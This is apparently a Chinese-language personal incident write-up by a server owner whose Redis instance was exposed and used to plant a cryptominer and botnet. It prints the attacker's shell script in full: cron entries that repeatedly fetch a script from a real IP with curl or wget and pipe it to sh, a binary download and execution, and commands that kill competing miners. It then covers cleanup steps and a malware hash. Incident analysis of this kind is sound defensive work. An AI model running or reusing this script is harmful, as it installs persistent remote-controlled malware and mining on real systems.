攻击者ip
http://165.225.157.157:8000/i.sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
if [ ! -f "/tmp/ddgs.3010" ]; then
curl -fsSL http://165.225.157.157:8000/static/3010/ddgs.$(uname -m) -o /tmp/ddgs.3010
fi
chmod +x /tmp/ddgs.3010 && /tmp/ddgs.3010
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
不过这个黑产牛没有搞什么破坏,就是用你机器对外发起了攻击,外加挖矿。。。阿里报警了200多条警告才去处理(因为服务器快到期和懒的原因)
原因也查出来了,就是Redis数据库配置不当,因为之前学习数据库的时候对外开放了,被人利用了redis提了权
处理方法
结束进程,关闭任务,修复漏洞,自己把Redis删除了因为没用了
嗯,
/root/.ssh/authorized_keys 路径下有一个免密登录证书,删除下,然后改密码
挖矿程序
- 恶意文件路径: /tmp/imWBR1
- 恶意文件md5: 9ebf7fc39efe7c553989d54965ebb468
基本上问题就处理完毕了
